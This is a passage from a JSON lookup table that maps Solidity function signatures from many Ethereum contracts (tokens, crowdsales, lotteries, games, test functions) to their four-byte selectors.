"lockMana(uint256)": "0xc5e36b7e", "_releaseTo(address)": "0x2ed23a73", "TokenVesting(address,uint256,uint256,uint256,bool,address)": "0x4068665d", "setTargetContract(address)": "0x47fc822f", "changeContractState(bool)": "0x689a521d", "lockMana(address,uint256)": "0x6b7006d7", "TerraformReserve(address)": "0xcc66ec47", "record(address,address)": "0x39035d56", "HumanERC223Token(uint256,string,uint8,string)": "0x83e03c3d", "BNW()": "0x9041bdeb", "CAMS()": "0x9f084b3a", "anailNathrachOrthaBhaisIsBeathaDoChealDeanaimh(address[],uint256[])": "0xb6e8bac7", "EternalToken()": "0xd2b93303", "BlackPyramid()": "0x8555de47", "ArtToken()": "0x7723e2f3", "MGU()": "0xa6b402ec", "increaseApprovalBatch(address[],uint256[])": "0x9affa42d", "approveBatch(address[],uint256[])": "0xc5c715e4", "multipleTransfer(address[],uint256[])": "0x0be2858e", "GrainToken()": "0xf59faf9e", "isNewPrice()": "0x93c5186c", "getNewPrice(uint256,uint256)": "0xbdb15209", "setPrices(bool,uint256)": "0xd6bc1b39", "AICT()": "0xa5541ca2", "UNSPAM(string,string,uint256,uint256,bool)": "0x6e06ac9d", "SPAM()": "0x90d83301", "TEXBToken()": "0x55181fba", "adjustLimitBetweenIssueAndNormal(uint256,bool)": "0x7cb6b35d", "issueTokenToGuaranteedAddress(address,uint256,bytes)": "0x3da64a06", "initialize(address,address,uint256,uint256,address,address)": "0xd2d10162", "ATTContribution()": "0x8830e09a", "investmoretokens()": "0x6c7de422", "POCN()": "0x30e7002c", "Electron()": "0x847f2177", "requestOracleValue()": "0x368d09d8", "ZhaoGuCoin()": "0x1242031a", "emergencyWithdrawAdmin()": "0x8f75362d", "finishedGameWithdraw()": "0xb3f50029", "getExtrasData()": "0xb75d7e50", "getBracketDataFinals()": "0xf7d4c7e3", "getBracketDataMiddleTeamIds(uint8)": "0xf72758e7", "getBracketData()": "0x6b6c5a7e", "getGroupData(uint256)": "0x3e4852bd", "setDataSourceAddress(address,address)": "0x3849794f", "_getTokenPrice()": "0xf3e4cac4", "withdrawPrize()": "0x48d37a58", "adminWithdrawBalance()": "0xfdf061f0", "buildToken(uint192,uint192,uint160,uint32)": "0x59b9a192", "isDataSourceCallback()": "0x582b6add", "CoreLayer()": "0xdd029560", "setLastPositions()": "0x653e2e0d", "setWinnerPrizes(uint32)": "0x88fdf3d4", "setTopWinnerPrizes()": "0x5a2a3039", "resetWinners(uint256)": "0x5dedd9cc", "checkOrder(uint32[])": "0x63e561b6", "calculateWinners(uint32)": "0x299e7abb", "setPayoutDistributionId()": "0x98c6a46f", "calculatePointsBlock(uint32)": "0xb427c148", "getExtraPoints(uint32)": "0x9da43ef4", "getQualifiersPoints(uint160)": "0xc1dfacb2", "getFinalRoundPoints(uint160)": "0x4083e2af", "getMatchPointsGroups(uint256,uint192)": "0xf77abd74", "matchWinnerOk(uint8,uint8,uint8,uint8)": "0x9dca4e0a", "dataSourceCallbackExtras(uint256,uint16)": "0xe967a9b7", "dataSourceCallbackFinals(uint256,uint8[4])": "0x3c070b60", "dataSourceCallbackTeamId(uint256,uint8)": "0x97d74abd", "dataSourceCallbackRoundOfSixteen(uint256,uint8)": "0x86b5e2b9", "dataSourceCallbackGroup(uint256,uint8,uint8)": "0x78e8b8fc", "dataSourceGetRedCards()": "0x87ffe5a7", "dataSourceGetYellowCards()": "0xbafcea6f", "dataSourceGetFinals()": "0x04f68d49", "dataSourceGetSemiResult(uint256)": "0x49afcc0e", "dataSourceGetQuarterResult(uint256)": "0x6bbe24d4", "dataSourceGetRoundOfSixteenResult(uint256)": "0x25580656", "dataSourceGetRoundOfSixteen(uint256)": "0x45dcb788", "dataSourceGetGroupResult(uint256)": "0xf68f8e42", "_setTokenOwner(address,uint256)": "0x70c40842", "_tokenIsApproved(address,uint256)": "0x465d5c27", "_userOwnsToken(address,uint256)": "0xff3ef460", "setPauseState(bool)": "0xcdb88ad1", "getRedCards()": "0x17ab6cbb", "getYellowCards()": "0x78dc7017", "getFinalTeams()": "0xbdf7220f", "getSemiResult(uint256)": "0x2115d328", "getQuarterResult(uint256)": "0xeef719b1", "getRoundOfSixteenResult(uint256)": "0xfd3acb5c", "getRoundOfSixteenTeams(uint256)": "0x13242733", "getGroupResult(uint256)": "0xa6d4b5c2", "isDataSource()": "0x037a9d30", "MedicalCannabis()": "0xf36e8dea", "PixelsMain()": "0xa3926f14", "setColorContract(address)": "0xcc02d73f", "bid(uint256,uint256,uint256,address)": "0x6da79a93", "bidBatch(uint256[],address)": "0x5a1a8593", "createStartingColors()": "0x36ef0cea", "ColorsMain()": "0xc504bfb8", "registerColor(string,uint256)": "0xda8e44d8", "getColor(uint256)": "0x80057b9a", "ThePatriotCoin()": "0x358a18b2", "soldSS()": "0x3384e128", "numOfSamples()": "0x13b96a9e", "account2Address()": "0x0e4b0ba8", "crowd_end_date()": "0x890f2168", "FACTOR_5()": "0xadb506a6", "window0StartTime()": "0xd8cdac0d", "COIN_PER_ETHER_BOARD()": "0x79d68f79", "aboveSevenBets()": "0x562c82ec", "gettransferableStartTime()": "0xe033192c", "ETH_VTA()": "0x75e3921c", "candidateXPAAssets()": "0x837386ca", "minMonsterHit()": "0x393e77c9", "ATTR_GOLDENGOOSE()": "0x2d381f84", "UBETCOIN_LEDGER_TO_LEDGER_ENTRY_DOCUMENT_PATH()": "0x8992ae0e", "retrieveFinished()": "0xfe2edc1e", "tokenICO()": "0x9e4a5ade", "CRSAccount()": "0x248fcccc", "BONUS_PCT_IN_VREO_SALE_PHASE_1()": "0xa5cd806b", "ICO_ONE()": "0x6f3ad341", "gatFund()": "0x3facdfb6", "stopRedeeming()": "0xc223f557", "saleWallet()": "0x7c4db77d", "ICO_PRICE3()": "0xe7cf7b34", "lastBlock_a4()": "0x9076aff7", "SPECIALIST_STAKE_THREE()": "0x45bda564", "amountGoal()": "0x0785001c", "maxPreICOTokenAmount()": "0x226187dc", "winnerKey()": "0xd476620b", "storedAmount()": "0x1d7315cc", "addressThreshold()": "0x23c6bc39", "discountPrice()": "0x84ad8e8f", "preTgeBonus()": "0xadfd5380", "bonusEndTime()": "0xee1a6295", "magnitude()": "0x19123c1f", "SGX_ADDRESS()": "0x2e28b3f5", "preSaleContract()": "0xb2c6b6dd", "genesisTime()": "0x42c6498a", "getTransformState()": "0x88088a54", "allPolls()": "0xbe82fffe", "preferredSaleTLYperETH()": "0xc285a245", "totalIssuerSupply()": "0xf5bf6d63", "userGrowthAddress()": "0x30b823f7", "withdrawDukeOwnersMoney()": "0x8adb208d", "unlockPeriodNum()": "0xe08ac014", "currentInitPart()": "0x9152486c", "distributedBonusStakes()": "0x9e20b768", "vote_for_candidate_C_for_free()": "0x1421c1a4", "priceView()": "0x172e1e52", "currentApplicationEntityAddress()": "0x5cbbdfc9", "gracePeriodCap()": "0x58c60d5e", "bountyReserveTokens()": "0x59d33d73", "firstTTax()": "0x7197c6d2", "opponent()": "0x93694f67", "PartnersAddress()": "0xee15ee31", "etherToUSDRate()": "0x6dd77c5d", "Funding_Setting_cashback_time_end()": "0xcee8fa1f", "ROLE_DISTRIBUTOR()": "0xbcec1df3", "Monthprofitend()": "0x61fc3790", "privateSaleEtherCap()": "0x16f8e09b", "ICOStart()": "0xd01ab31a", "MELON_CONTRACT()": "0xd94a75bc", "blink_block()": "0xe0709589", "CROWD_WEEK2_PERIOD()": "0x3d0977e1", "CTO_SHARE()": "0x7bd9e8fd", "_minimumBuyAmount()": "0x6b9cf534", "deploymentTime()": "0xecda10f5", "inviteRate()": "0xc978a7bc", "saleTokenSupply()": "0xc0ad7427", "starterPackPrice()": "0x5c714e90", "oneMillion()": "0x413e920d", "dth()": "0x01e57a37", "minterAddress()": "0x34d722c9", "bbNetworkGrowthWallet()": "0x5211f843", "bonusPhase()": "0x6bd0021c", "firstWeekEndTime()": "0xdb56702b", "Stage1Allocation()": "0x258fd4f3", "nextRoundWinner()": "0x6e62cdab", "tokenZLT()": "0xd3c564ad", "firstContractAddress()": "0x78afda07", "updateIcoStatus()": "0x2a1a8d4a", "poolContract()": "0x88d52ef7", "indPresaleDeposit()": "0x5467f508", "emergencyFlagAndHiddenCap()": "0x0ccc642e", "pegglebot()": "0x38742685", "extraTime()": "0x1800c0fe", "MINTTIME()": "0xfb2861ff", "currentSeries()": "0x5caa0dec", "maxIssueTokenLimit()": "0x213e84d3", "t_Andrey()": "0x9367a863", "phaseOneLimit()": "0x4cfd5a82", "BOUNTY_AMOUNT()": "0xe9e48880", "issueAmount()": "0x195fd221", "soldTokensMainSale()": "0x0e407bdd", "beerContract()": "0xb2112ce6", "PRICE_9()": "0xad2ec740", "initial_time()": "0xc46cacae", "destTokensReferals()": "0xbc8cb3f9", "E()": "0x92bbf6e8", "trueUSD()": "0x62ffb3bf", "EGGS_TO_HATCH_1BULLS()": "0xd12c08bf", "_setTokenOwner(uint256,address)": "0x7840c781", "_clearTokenApproval(uint256)": "0x7f9245d0", "_getApproved(uint256)": "0x6d5e136d", "_clearApprovalAndTransfer(address,address,uint256)": "0x16b208eb", "_createCard(uint256,address)": "0x40bff23d", "CorsariumAccessControl()": "0xa4ebf74d", "FOMOCoin()": "0x4ce14f8c", "NokuFlatPlan(uint256,uint256,address,address)": "0xf12f6925", "EpsToken()": "0xfb9ab10b", "AllForOne()": "0x99bea0bd", "changeBet(uint256)": "0xedd7bb75", "LongLegs()": "0x4f958146", "Senpona(uint256,string,uint8,string)": "0x4bd7730b", "Boocoin()": "0x1045290e", "Spacoin()": "0x107853a9", "SeeToken(uint256,string,string)": "0xb402973c", "makeUnicTaskHashId(address)": "0x45152b14", "updateDream(address,string,string)": "0x92df94ec", "newDream(address,string,string)": "0x6574bdd2", "setValidatorForND(uint256,uint256,uint256,uint256)": "0x7e8e353c", "changePrefererForTask(address,uint256,address)": "0xeebe41e0", "findCliPendTAndSetPrfm(address,address)": "0x0d3f5cb5", "findAllCliWithPendingTask(address)": "0x3198a38f", "countPerfClients(address)": "0x413dc451", "countCliDreams(address)": "0x855876d5", "countAllCliDrm()": "0xebf53e0e", "countClients()": "0x8463bcf5", "getDStructData(address,uint256)": "0x1859b2d7", "watchPreferersTasks(address,uint256)": "0x1b800a3d", "ClientsHandler()": "0x3b9bd54d", "bytesToBytes32(bytes,uint256)": "0x53584939", "bytes32ArrayToString(bytes32[])": "0x9cbc87a3", "countCliTasks()": "0x1bcf5241", "countCliManagers()": "0x385fea5c", "countPerfManagers()": "0x652de5ad", "countPerformers()": "0x20a733df", "setCRManager(address)": "0x072e28c2", "setPerformer(address)": "0xb34f407d", "setPFManager(address)": "0x9965ea53", "PiedPiperCoin(uint256,string,uint8,string)": "0x0d7714e2", "TIC()": "0x00478f87", "DEDToken()": "0xdbf323dd", "transferFromFund(address,uint256)": "0x9e1c6d6b", "shareBalance(address,uint256)": "0xb0ddaddd", "payDAPP(address,uint256,address)": "0xb6acd931", "payInternal(address,address,uint256,address)": "0x0980150f", "pay(address,uint256,address)": "0xf0fcc6bb", "pay2(address,uint256,address)": "0x22d4e0fd", "balanceOf2Internal(address,address)": "0x8dcb25e0", "balanceOf2(address,address)": "0x96784f45", "setMaxLinkedWalletCount(uint8)": "0x20364306", "unLinkFromMasterWallet(address,address)": "0xefb7fa77", "linkToMasterWallet(address,address)": "0x416e70f6", "unLinkFromMasterWallet(address)": "0xcc7188a5", "linkToMasterWallet(address)": "0xdab91e87", "setCryptaurReserveFund(address)": "0x90935301", "setCryptaurRewards(address)": "0x71fcc672", "setCryptaurToken(address)": "0xde17dfa9", "setCryptaurRecovery(address)": "0xa4d99522", "transferToToken(address[])": "0x62f5a23f", "setUnlimitedMode(bool,address)": "0x880e87ed", "CryptaurDepository()": "0x0d0b86c6", "changeMasterAddress(address,address)": "0x7f31b480", "changeLinkedAddress(address,address)": "0x68acfcbb", "getOrAddMasterWallet(address)": "0x7483883d", "getMasterWallet(address)": "0xb543d4b4", "addMasterWallet(address)": "0x0ff3d57e", "applyChangeWalletAddress(address,address)": "0x9a751072", "isLinkedWallet(address)": "0x8c988a46", "isMasterWallet(address)": "0x53de63e3", "unLinkFromMasterWalletInternal(address,address)": "0x2c4e8885", "linkToMasterWalletInternal(address,address)": "0x7de2fe4d", "getLinkedWallets(address)": "0xcdb0ec6b", "AddressBook()": "0xdca5f188", "withdrawNotification(uint256)": "0x8fe316fe", "depositNotification(uint256)": "0x55976b05", "payment(address,address,uint256,address)": "0x21fda809", "executeLottery(address)": "0xad7ed3c2", "canLotteryBeExecuted()": "0xc19678d5", "PVE()": "0x0106bc8f", "getArtwork(uint256)": "0x167ddf6e", "ArtworkCore()": "0x7d268ac1", "_computeNextArtworkPrice()": "0x32e5645d", "createArtworkAuction(string,string,uint32)": "0xf7138eaf", "createPromoArtwork(string,string,uint32,address)": "0x7d95dcd7", "_uintToBytes(uint256)": "0xa40ae4b7", "_uintToString(uint256)": "0xe082707c", "_strConcat(string,string,string,string)": "0x85f2e4b1", "getUniqueKey(string,string,uint32)": "0x58750784", "_createArtwork(string,string,uint32,address)": "0xc0506782", "averageArtworkSalePrice()": "0x5f56e134", "INCash()": "0x998f9203", "getTickets(address)": "0x0ad182bc", "executeLottery()": "0x1c321f62", "BroFistCoin()": "0x8d5e4f9c", "applyBonus(uint256)": "0xd87c3df5", "grantReserveTokens(address)": "0x9d8d22f4", "grantFounderTokens(address)": "0x83f12f91", "grantTeamTokens(address)": "0xe40a955c", "grantAdvisorTokens(address)": "0x8105aa55", "eventContract()": "0xe274fd24", "funding()": "0xcb4c86b7", "calcMarketFee(uint256)": "0xb0011509", "netOutcomeTokensSold(uint256)": "0xa157979c", "createdAtBlock()": "0x59acb42c", "withdrawFees()": "0x476343ee", "sell(uint8,uint256,uint256)": "0x46280a80", "shortSell(uint8,uint256,uint256)": "0x28c05d32", "marketMaker()": "0x1f21f9af", "creator()": "0x02d05d3f", "removeOrders(uint256,uint256)": "0x868eb6bf", "sellTokens(uint256,uint256,uint256)": "0x709ef231", "removeOrder(uint256)": "0x9645337a", "addOrder(address,uint256)": "0xdb6a3652", "buyTokenFromModerator(uint256,address,uint256,bool)": "0x4913732e", "buyTokensForProposal(uint256,address)": "0x00b172d7", "sendTo(address,uint256)": "0x9e1a00aa", "buyTokensFor(uint256,address,uint256,bool)": "0x22a7118d", "PUSH1()": "0xa172045d", "_getAllParents(bytes32)": "0xa300eadf", "createWithParents(bytes32,bytes32,bytes32[])": "0x7fdd458d", "_addChildToParent(bytes32,bytes32)": "0x98f69aeb", "testCreateWithParentsForeign2()": "0x26d3e889", "testCreateWithParentsForeign1()": "0xf6951038", "testCreateWithParentsForeign0()": "0xf94497fe", "testFailCreateWithParentsForeignNotInUse1()": "0xdddb983b", "testFailCreateWithParentsForeignNotInUse0()": "0x0ee8e338", "testControlCreateWithParentsForeignNotInUse()": "0xbf0d44d5", "testCreateWithParents()": "0x44019db3", "testFailCreateWithParentsParentNotInUse1()": "0x89a45223", "testFailCreateWithParentsParentNotInUse0()": "0x46d47cdf", "testControlCreateWithParentsParentNotInUse()": "0x041dd3f6", "testFailCreateWithParentsParentSameItemId1()": "0x8a7ef3df", "testFailCreateWithParentsParentSameItemId0()": "0x28e47076", "testControlCreateWithParentsParentSameItemId()": "0x015689c6", "testFailCreateWithParentsSameItemId()": "0xba907b7e", "testControlCreateWithParentsSameItemId()": "0x3d608572", "testCreateWithParentForeign()": "0x0de04691", "testFailCreateWithParentForeignNotInUse()": "0x3d6b0cb7", "testControlCreateWithParentForeignNotInUse()": "0x30840c31", "testFailCreateWithParentParentNotInUse()": "0xbab9fc63", "testControlCreateWithParentParentNotInUse()": "0xbca9e546", "testFailCreateWithParentParentSameItemId()": "0x3ce54ac3", "testControlCreateWithParentParentSameItemId()": "0x9d9c9a0d", "testFailCreateSameItemId()": "0x343f40a0", "testControlCreateSameItemId()": "0x6844ab43", "getAllParents(bytes32)": "0x32c4903d", "getParent(bytes32,uint256)": "0x33ac7256", "getParentCount(bytes32)": "0x215de48a", "assemblyTest()": "0x732e632e", "getUint(int256)": "0x590ba734", "testFailAddForeignChildNotChild()": "0x4e6c61aa", "testFailAddForeignChildNotInUse()": "0xfc13a76a", "testCreateWithForeignParent()": "0x121f2081", "testFailCreateWithForeignParentNotInUse()": "0xca615662", "testControlCreateWithForeignParentNotInUse()": "0x59e1667d", "testCreateWithParent()": "0x473ae9fe", "testFailCreateWithParentNotInUse()": "0x75f208bf", "testControlCreateWithParentNotInUse()": "0x64d0d64c", "testFailCreateWithParentSameItemId()": "0xa121d8df", "testControlCreateWithParentSameItemId()": "0x2aaf1685", "testFailCreateWithParentSameNonce()": "0x8dc1c44d", "testControlCreateWithParentSameNonce()": "0x9643aef4", "getAllChildren(bytes32)": "0xfbdf0378", "getChild(bytes32,uint256)": "0x958d1725", "getChildCount(bytes32)": "0xa09e3d0a", "_getAllChildren(bytes32)": "0x2eaad0b0", "createWithParent(bytes32,bytes32,bytes32)": "0x31230e23", "getParent(bytes32)": "0x4048c449", "addForeignChild(bytes32,bytes32)": "0x93c8b0d4", "getAllRevisionTimestamps(bytes32)": "0x8cb3728c", "getRevisionTimestamp(bytes32,uint256)": "0x05664cea", "getAllRevisionIpfsHashes(bytes32)": "0x7c699401", "getRevisionIpfsHash(bytes32,uint256)": "0x72cef34b", "getState(bytes32)": "0x09648a9d", "_getAllRevisionTimestamps(bytes32)": "0xcd22f418", "_getRevisionTimestamp(bytes32,uint256)": "0xf50f1ba9", "_getAllRevisionIpfsHashes(bytes32)": "0x2ab7d104", "restart(bytes32,bytes32)": "0x165ffd10", "_deleteAllPackedRevisionTimestamps(bytes32)": "0x1b5710ed", "updateLatestRevision(bytes32,bytes32)": "0x032b0824", "createNewRevision(bytes32,bytes32)": "0x001a4f5e", "_setPackedTimestamp(bytes32,uint256)": "0xa6c09381", "getInUse(bytes32)": "0x455ea98c", "getItemStore(bytes32)": "0xb0673d57", "create(bytes32,bytes32)": "0x634bc7db", "getState(bytes20)": "0xf25e7bb4", "getInUse(bytes20)": "0x50035eb8", "getAllRevisionTimestamps(bytes20)": "0x261c42dd", "getRevisionTimestamp(bytes20,uint256)": "0xc5cd3bec", "_getAllRevisionTimestamps(bytes20)": "0x4e57d27d", "_getRevisionTimestamp(bytes20,uint256)": "0x4ae6ab70", "_deleteAllPackedRevisionTimestamps(bytes20)": "0x31861423", "_setPackedTimestamp(bytes20,uint256)": "0xe382b854", "emergencyToggle()": "0x00a53598", "changeEndBlock(uint256)": "0x82222674", "changeStartBlock(uint256)": "0x5437f098", "changeWallet(address)": "0x98b9a2dc", "changePrice(uint256)": "0xa2b40d19", "withdrawRemainder()": "0x8b9b1cbd", "getMaxPrice()": "0x82d8dff6", "torchDividendsOf(address)": "0xe5c0fa69", "referralDividendsOf(address)": "0xd6349dd6", "tokenDividendsOf(address)": "0xfd6180cb", "tokenContractBalance()": "0xe4403507", "torchContractBalance()": "0x75d5a7c6", "takeTheTorch(address)": "0x770e9e85", "isChampionAccount(address)": "0x5d0f4ee0", "getAccountCoords(address)": "0xb5147d64", "setAccountCoords(string)": "0xf9f81a73", "getAccountNote(address)": "0xf6fee732", "setAccountNote(string)": "0x51cb860a", "getAccountNickname(address)": "0xdbbd78da", "getTodayOwnerAddress()": "0x8ceeaaa8", "getTodayOwnerName()": "0x62571cac", "getTodayIndex()": "0x154faf5d", "isHolidayToday()": "0x3980b680", "isHoliday(uint256)": "0x7597eede", "updateHolidayState(uint8,string)": "0x9e8c39ed", "setWhaleIncreaseLimit(uint256)": "0x8e767411", "setWhaleMax(uint256)": "0xd0ffecaa", "setDonationsReceiver(address)": "0xa6256644", "setOwnTheDayContract(address)": "0xeac5426f", "setDateTimeLib(address)": "0xd8b3ad77", "initialize(address,address,address)": "0xc0c53b8b", "CryptoTorch()": "0x4883b6ce", "withdrawFor(address)": "0x9eca672c", "sellFor(address,uint256)": "0x7f2438cb", "calculateEtherReceived(uint256)": "0xc257c851", "referralBalanceOf(address)": "0x46534649", "profitsOf(address)": "0x01ec0793", "reclaim()": "0x80e9071b", "settleUnclaimedPerTokenPayouts(address,address)": "0xb9668eb2", "currentPayout(address,address,bool)": "0xb312dc91", "blacklistAddress(address,address)": "0x4f0a746f", "CustomPOAToken(string,string,address,address,uint256,uint256,uint256)": "0xc570e952", "FIDAToken()": "0x33cc4f9f", "SECToken(uint256,string,string)": "0x2f00b84a", "getCellsSinceLastEvent(address)": "0x365f6e9f", "getMyCells()": "0xd33c0a4d", "getSpermlordReq()": "0xb7020c63", "becomeSpermlord()": "0xe6b827a6", "getMySperm()": "0xdc61164d", "getFreeSperm()": "0x1df73f51", "calculateCellBuySimple(uint256)": "0xc26875a4", "calculateCellBuy(uint256,uint256)": "0xb86c6b7b", "calculateCellSell(uint256)": "0x419469fe", "buyCells()": "0x5e05e84d", "sellCells()": "0x8fb25f82", "makeSperm(address)": "0x0991bb09", "SpermLabsReborn()": "0x2b459e81", "PlanEX()": "0x6c1c86f7", "setRewardManagerLimit(uint256)": "0xe73e5063", "setRewardManger(address,address)": "0x93402e17", "NeckCoin()": "0xc5f7ed63", "getCreditsAtIndex(uint256)": "0x369badf1", "getUserKey(uint256)": "0xdd1e2651", "getCreditsFor(string)": "0xaff5dff2", "getUserWallet(string)": "0xe5775515", "withdrawUserSpecifiedFunds(string,uint256,uint8)": "0xcb3a11f9", "assignUserWallet(string,address)": "0xa437164b", "transferCreditsInternally(string,uint256,uint8,string)": "0x63d60745", "buyCreditsAndSpendAndRecover(string,uint256,uint8,address,uint256,address)": "0xbf11f412", "buyCreditsAndSpend(string,uint256,uint8,address,uint256)": "0x47db0a24", "reduceCredits(string,uint256,uint8,address)": "0x784f47ff", "increaseCredits(string,uint256,uint8,address)": "0x13ac58bb", "getSaleIsOn()": "0x0b2478b3", "setAmountPerEther(uint256)": "0x456cee82", "setEscrowAddress(address)": "0xddeb63b5", "buyFood(uint32)": "0xb38f974a", "FoodStore()": "0x45e0e324", "ExToke(address,address,address,uint256,uint256,uint256)": "0x4fc63e02", "CBIX(string,string,uint256,uint8)": "0x97379c32", "rollFive(address,uint8,uint8,uint8,uint8,uint8)": "0xb42e49ef", "rollFour(address,uint8,uint8,uint8,uint8)": "0x6f993a74", "rollThree(address,uint8,uint8,uint8)": "0x5d29bd40", "rollTwo(address,uint8,uint8)": "0x2b30a84e", "rollOne(address,uint8)": "0x4d7e897f", "rewardTheWinner(uint8)": "0x47c98521", "isWinner(uint8,uint8[5],uint8[5])": "0xed6183bf", "splitTheBet(address)": "0x5897e3e4", "isValidNumber(uint8)": "0xf6c05625", "getRN()": "0x161965d9", "appendStock(uint256)": "0xa0275c05", "fillTheBank()": "0x85efb721", "random(uint256,int256,int256)": "0x1b18ffac", "divf(int256,int256,uint256)": "0xccab841b", "GoldBlocksTickets()": "0xf1bba50a", "refundCancelledGame(uint32,uint32[])": "0xfcd58363", "winners(uint32,uint32[],uint64[])": "0x998282e9", "finishGame(uint32,bytes32)": "0x6339fbcb", "participateGame(uint32,uint32,uint32,uint32)": "0x001ee6b2", "createGame(uint32,uint64,uint32,uint32)": "0x98f2af3a", "deleteInvest(uint32,uint32)": "0xe7acdcd0", "invest(uint32,uint32,uint64,uint16)": "0xd66cac2b", "changeCommonRebate(uint256)": "0xa61855a4", "changeCommonDiscount(uint256)": "0x4dc3f289", "setAccountFeeModifiers(address,uint256,uint256)": "0xf89a053b", "tradingFeeModifiers(address,address)": "0xca8127d4", "accountFeeModifiers(address)": "0x57d62a30", "getUsedCoreSupply()": "0xb6a59176", "getUsedPaymentSupply()": "0xcab09273", "getUsedReserveSupply()": "0xd6ae5f29", "getReveralSupply()": "0xd635fc63", "getCoreSupply()": "0x03060b68", "getPaymentSupply()": "0x6b19e692", "getReserveSupply()": "0x7e2f6e3b", "getIcoSupply()": "0xa48d9e70", "pushMilestone(uint16,string,string,uint64,bool)": "0x7c8c2234", "approveAndPayout(uint16)": "0x4ce053ab", "markDone(uint16)": "0xddeae8ca", "confirmProposalAndTransferFunds(uint16,uint16)": "0x90e57cac", "getProposalContractor(uint16,uint16)": "0xd319ab75", "getProposalAmount(uint16,uint16)": "0x81bdc78d", "getProposal(uint16,uint16)": "0x67b14a21", "addProposal(uint16,uint256,string)": "0xb4e3c486", "addSubMilestone(uint16,string,string,uint64,bool)": "0xe53a22ac", "addGeneralMilestone(string,string,uint64)": "0x8a469c16", "BitcoinCrown()": "0x54ad2d22", "RxEALSaleContractExtended()": "0x58ff7613", "GoshenCoinCash()": "0x9b059309", "FRPRUPEES()": "0xfec7c0a2", "newPrice(uint256)": "0xfe72ac7f", "newCoinOwner(address)": "0x4a8305b4", "changeMaxCap(uint256)": "0x6d1e839c", "changeWhitelistedAddressCapAmount(address,uint256)": "0x9f28f8c2", "unwhitelistAddress(address,address)": "0x6c7d4c4c", "whitelistAddress(address,address,uint256)": "0x41ef858f", "StarbasePresaleWallet(address[],uint256,uint256)": "0xa847a1b3", "getResultblockHash(bytes32)": "0x802293c2", "transactionList()": "0x515da4b9", "addTxInBuffer(address,uint256,uint256,uint256,uint256)": "0x45e4db40", "softWithdraw()": "0x258c5ddd", "calculateAllBuyBackSum()": "0xdd3129a9", "hardWithdrawAll()": "0x8db261e0", "handleDividends()": "0x49f65ce4", "proceedDividends(uint256)": "0x6d30921c", "getTotalVolume()": "0x0b9d98e9", "getDividendTransactionLeft()": "0xf0e42a1f", "setDividendTransactionNumber(uint256)": "0x016aba15", "getLastDividendsAmount()": "0x9415931d", "buyback(uint256)": "0x79a9fa1c", "playerTransactionList(address)": "0x08b6bb56", "addPlayerTxHistory(address,uint256,uint256,uint256,uint256)": "0x0ec59606", "calculatePlayerValue(address)": "0x4db6397f", "getPlayerIds()": "0xfc5fc345", "getPlayer(address)": "0x5c12cd4b", "createPlayerIfNeeded(address)": "0xf1167e0d", "buybackPriceOf(uint256)": "0x6f94e260", "getItemsByOwner(address)": "0x2c67a8e5", "totalItems()": "0x2799276d", "itemExists(uint256)": "0x843bd641", "getItemIdsPagable(uint256,uint256)": "0xaef41e3a", "getItemIds()": "0xef0614b9", "addItems(uint256[],uint256[],address)": "0xda883e6a", "addItem(uint256,uint256,address)": "0xc066bd1a", "ItemSelling()": "0x8bbb668b", "mintFull(address,uint256)": "0x3245a55f", "LitToken()": "0x3f9e50fd", "addBonusTokens(uint256,uint256)": "0xfc380d96", "BTHRTokenSale(uint256,address)": "0x8830a718", "Crowdsale(uint256,address)": "0x34bc5156", "BethereumToken()": "0x2c0a33ef", "GivethCampaign(uint256,uint256,uint256,address,address)": "0x71bb3cc8", "ETHMONEY()": "0xcaef6a84", "setTransactionsAllowed(bool)": "0xe1b0d4b2", "setPreIcoDates(uint256,uint256)": "0xdadc89eb", "icoFinish()": "0xb333ce0d", "buyFor(address,uint256,uint256)": "0x935b7dbd", "refundInternal(uint256)": "0xe9c801e1", "icoFinishInternal(uint256)": "0xfbc94bd1", "getIcoStep(uint256)": "0xd45b5f71", "EscrowICO()": "0xb7fd45a0", "calculateBonus(uint8,uint256,uint256)": "0x9379d936", "Token(uint256,string,string,string,uint8)": "0x057101b1", "saleOn()": "0x773ef1cf", "buyOx()": "0x15143d6a", "OX_TOKEN()": "0x6ce12737", "YondToken()": "0x49f02baf", "TokenERC20(string,string,uint8,address,uint256)": "0x7e9e3d51", "setSecondBonus(uint256)": "0x32a9df46", "setFirstBonus(uint256)": "0x7734e398", "setFirstBonusTokensLimit(uint256)": "0x4700dc57", "softcapReachedCallabck()": "0x2d2c9ed8", "setSpecialWallet(address)": "0x085e658c", "setAvailableAfterStart(uint256)": "0xfef9cfe1", "curQuater()": "0x257c88b5", "BrainLegitCoin()": "0x9e9ce791", "imaxChainToken()": "0xe6346867", "getCaptainCount(uint32)": "0xaebad3a4", "prepurchase(uint32)": "0x2e7db440", "setCaptainTokenContract(address,address)": "0x8f908cbd", "setGameConfigContract(address,address)": "0xee78b99c", "CaptainSell()": "0xc1c5a3b6", "getSellable(uint32)": "0x732519d5", "getCardInfo(uint32)": "0x1b8bd57c", "CreateCaptainToken(address,uint256,uint32,uint32,uint32,uint32,uint32,uint256)": "0x6aaacb3f", "getRandomFromBlockHash(uint256,uint256)": "0x79c0909e", "restartPeriod()": "0xb9855c76", "getPrizePoolSize()": "0xa50643b7", "CIRCLECOIN()": "0x51714d2d", "Yiha()": "0x2ed20ec7", "updateCurrentSupply()": "0xc6b2a5dd", "ProgressiveToken(string,uint8,string,uint256,uint256,uint256,address)": "0x3e42ed80", "token(string,uint8,string)": "0x00008962", "emergencyDrain(uint256)": "0x70544b74", "airDrop(address[],uint256)": "0xfd1fc4a0", "VikkyTokenAirdrop(address,address)": "0x51a1ad6b", "PowerOfPutin()": "0x01090c9e", "GSCoin()": "0x27c4a208", "sendBonus(address,uint256)": "0x59214765", "setBackendWallet(address)": "0x0edfe7ec", "RIKCoin(address,address)": "0xa300aa66", "GemCoin()": "0xc10e5fe7", "HYIPToken(address,string,string,uint256,uint256)": "0x59b56a59", "AssetDK3()": "0x903ff4fc", "UNJUST(string,string,uint256,uint256,bool)": "0xfdbb9fdb", "pow()": "0xef7e1e89", "partnerInfo_for_Owner(address)": "0x77f2d0b0", "partnerInfo_for_Partner(bytes32,uint8,bytes32,bytes32)": "0xb5ac7894", "partnerInfo(address,address)": "0x878d5ff7", "calc_partnerPercent(uint256)": "0x886d969b", "checkPromo(string)": "0x17d9b4ab", "setPromoToPartner(string)": "0x06faebbe", "setContractICO(address,address)": "0x021a11d0", "setContractPreICO(address,address)": "0x310774a3", "setReferralPercent(uint256)": "0x6129f25f", "str_length(string)": "0x8bdbee39", "BMICOAffiliateProgramm()": "0x16831877", "enableTransfering()": "0x3f61dcf6", "addEarlyAccessAddress(address,address)": "0x1bd2511a", 